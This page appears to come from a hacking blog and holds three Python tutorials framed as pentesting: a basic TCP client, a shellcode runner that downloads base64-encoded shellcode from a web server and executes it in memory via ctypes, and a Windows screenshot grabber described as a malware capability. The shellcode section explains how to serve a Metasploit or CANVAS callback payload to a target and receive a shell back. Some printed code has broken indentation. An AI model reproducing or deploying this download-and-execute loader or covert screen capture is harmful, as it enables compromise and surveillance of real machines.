Python For Hacking

Creating A TCP Client for Hacking Using Python

February 1, 2022 by BlackHammer 2 Comments

Introduction To Python

Python has a simple syntax similar to the English language. Python has syntax that allows developers to write programs with fewer lines than some other programming languages. Python runs on an interpreter system, meaning that code can be executed as soon as it is written.

TCP Client Using Python

There have been countless times during penetration tests that I’ve needed
to whip up a TCP client to test for services, send garbage data, fuzz, or
any number of other tasks. If you are working within the confines of large
enterprise environments, you won’t have the luxury of networking tools or
compilers, and sometimes you’ll even be missing the absolute basics like the
ability to copy/paste or an Internet connection. This is where being able to
quickly create a TCP client comes in extremely handy. But enough jabber-
ing—let’s get coding. Here is a simple TCP client.

import socket
target_host = "www.google.com"
target_port = 80
# create a socket object
 client = socket.socket(socket.AF_INET, socket.SOCK_STREAM)

We first create a socket object with the AF_INET and SOCK_STREAM param-
eters. The AF_INET parameter is saying we are going to use a standard
IPv4 address or hostname, and SOCK_STREAM indicates that this will be a TCP Client.

# connect the client
 client.connect((target_host,target_port))
# send some data
 client.send("GET / HTTP/1.1\r\nHost: google.com\r\n\r\n")

We then connect the client to the server and send it some data.

# receive some data
 response = client.recv(4096) 
print response

The last step is to receive some data back and print out the response .
This is the simplest form of a TCP client, but the one you will write most
often.

In the above code snippet, we are making some serious assumptions
about sockets that you definitely want to be aware of. The first assump-
tion is that our connection will always succeed, and the second is that the
server is always expecting us to send data first (as opposed to servers that
expect to send data to you first and await your response). Our third assump-
tion is that the server will always send us data back in a timely fashion. We
make these assumptions largely for simplicity’s sake. While programmers
have varied opinions about how to deal with blocking sockets, exception-
handling in sockets, and the like, it’s quite rare for pentesters to build these
niceties into the quick-and-dirty tools for recon or exploitation work, so
we’ll omit them in this article.

Also Check Google Dorks | An Easy Way Of Hacking Using Google

How To Make Base64 Encrypted Shellcode Using Python | ctypes

December 7, 2021 by BlackHammer Leave a Comment

What Is Shellcode

In hacking, a shellcode is a small piece of code used as the payload in the exploitation of a software vulnerability. It is called “shellcode” because it typically starts a command shell from which the attacker can control the compromised machine, but any piece of code that performs a similar task can be called shellcode. Because the function of a payload is not limited to merely spawning a shell, some have suggested that the name shellcode is insufficient. However, attempts at replacing the term have not gained wide acceptance. Shellcode is commonly written in machine code.

Pythonic Shellcode Execution

There might come a time when you want to be able to interact with one of your target machines, or use a juicy new exploit module from your favorite penetration testing or exploit framework. This typically—though not always requires some form of shellcode execution. In order to execute raw shellcode, we simply need to create a buffer in memory, and using the ctypes module, create a function pointer to that memory and call the func- tion. In our case, we’re going to use urllib2 to grab the shellcode from a web server in base64 format and then execute it.

Let’s get started! Open up shell_exec.py and enter the following code:

import urllib2
import ctypes
import base64
# retrieve the shellcode from our web server
url = "http://localhost:8000/shellcode.bin"
response = urllib2.urlopen(url) 
# decode the shellcode from base64 
shellcode = base64.b64decode(response.read())

How awesome is that? We kick it off by retrieving our base64-encoded shellcode from our web server.

# create a buffer in memory
 shellcode_buffer = ctypes.create_string_buffer(shellcode, len(shellcode))

We then allocate a buffer to hold the shellcode after we’ve decoded it.

# create a function pointer to our shellcode
 shellcode_func = ctypes.cast(shellcode_buffer, ctypes.CFUNCTYPE(ctypes.c_void_p))

The ctypes cast function allows us to cast the buffer to act like a function pointer so that we can call our shell- code like we would call any normal Python function.

# call our shellcode
 shellcode_func()

We finish it up by calling our function pointer, which then causes the shellcode to execute.

Let’s Take It For A Spin

You can handcode some shellcode or use your favorite pentesting frame- work like CANVAS or Metasploit3 to generate it for you. I picked some Windows x86 callback shellcode for CANVAS in my case. Store the raw shellcode (not the string buffer!) in /tmp/shellcode.raw on your Linux machine and run the following:

thedarktech$ base64 -i shellcode.raw > shellcode.bin
thedarktech$ python -m SimpleHTTPServer
Serving HTTP on 0.0.0.0 port 8000 ...

We simply base64-encoded the shellcode using the standard Linux command line. The next little trick uses the SimpleHTTPServer module to treat your current working directory (in our case, /tmp/) as its web root. Any requests for files will be served automatically for you. Now drop your shell_exec.py script in your Windows VM and execute it. You should see the following in your Linux terminal:

192.168.112.130 - - [12/Jan/2014 21:36:30] "GET /shellcode.bin HTTP/1.1" 200

This indicates that your script has retrieved the shellcode from the simple web server that you set up using the SimpleHTTPServer module. If all goes well, you’ll receive a shell back to your framework, and have popped calc.exe, or displayed a message box or whatever your shellcode was compiled for.

Also Check How To Take Screenshot In Windows Computer Using Python.

How To Take Screenshot In Windows Computer Using Python

December 6, 2021 by BlackHammer 1 Comment

Most pieces of malware and penetration testing frameworks include the capability to take screenshots against the remote target. This can help capture images, video frames, or other sensitive data that you might not see with a packet capture or keylogger. Thankfully, we can use the PyWin32 package to make native calls to the Windows API to grab them.

A screenshot grabber will use the Windows Graphics Device Interface (GDI) to determine necessary properties such as the total screen size, and to grab the image. Some screenshot software will only grab a picture of the currently active window or application, but in our case we want the entire screen.

Let’s get started. Crack open screenshotter.py and drop in the following code:

import win32gui
import win32ui
import win32con
import win32api
# grab a handle to the main desktop window
 hdesktop = win32gui.GetDesktopWindow()

Let’s review what this little script does. First we acquire a handle to the entire desktop, which includes the entire viewable area across multiple monitors.

# determine the size of all monitors in pixels
 width = win32api.GetSystemMetrics(win32con.SM_CXVIRTUALSCREEN) 
height = win32api.GetSystemMetrics(win32con.SM_CYVIRTUALSCREEN)
left = win32api.GetSystemMetrics(win32con.SM_XVIRTUALSCREEN)
top = win32api.GetSystemMetrics(win32con.SM_YVIRTUALSCREEN)

We then determine the size of the screen(s) so that we know the dimensions required for the screenshot.

# create a device context
 desktop_dc = win32gui.GetWindowDC(hdesktop) 
img_dc = win32ui.CreateDCFromHandle(desktop_dc)

We create a device context using the GetWindowDC function call and pass in a handle to our desktop.

# create a memory based device context
 mem_dc = img_dc.CreateCompatibleDC()

Next we need to create a memory-based device context where we will store our image capture until we store the bitmap bytes to a file.

# create a bitmap object
 screenshot = win32ui.CreateBitmap() 
screenshot.CreateCompatibleBitmap(img_dc, width, height)
mem_dc.SelectObject(screenshot)

We then create a bitmap object that is set to the device context of our desktop. The SelectObject call then sets the memory-based device context to point at the bitmap object that we’re capturing.

# copy the screen into our memory device context
 mem_dc.BitBlt((0, 0), (width, height), img_dc, (left, top), win32con.SRCCOPY)

We use the BitBlt function to take a bit-for-bit copy of the desktop image and store it in the memory- based context. Think of this as a memcpy call for GDI objects.

# save the bitmap to a file 
screenshot.SaveBitmapFile(mem_dc, 'c:\\WINDOWS\\Temp\\screenshot.bmp')
# free our objects
mem_dc.DeleteDC()
win32gui.DeleteObject(screenshot.GetHandle())

The final step is to dump this image to disk.

This script is easy to test: Just run it from the command line and check the C:\WINDOWS\Temp directory for your screenshot.bmp file.

Let’s move on to executing shellcode in the next article.

Also Check How To Make A Keylogger For Windows In Python.

Packet Sniffer On Windows And Linux Using Python | For Hackers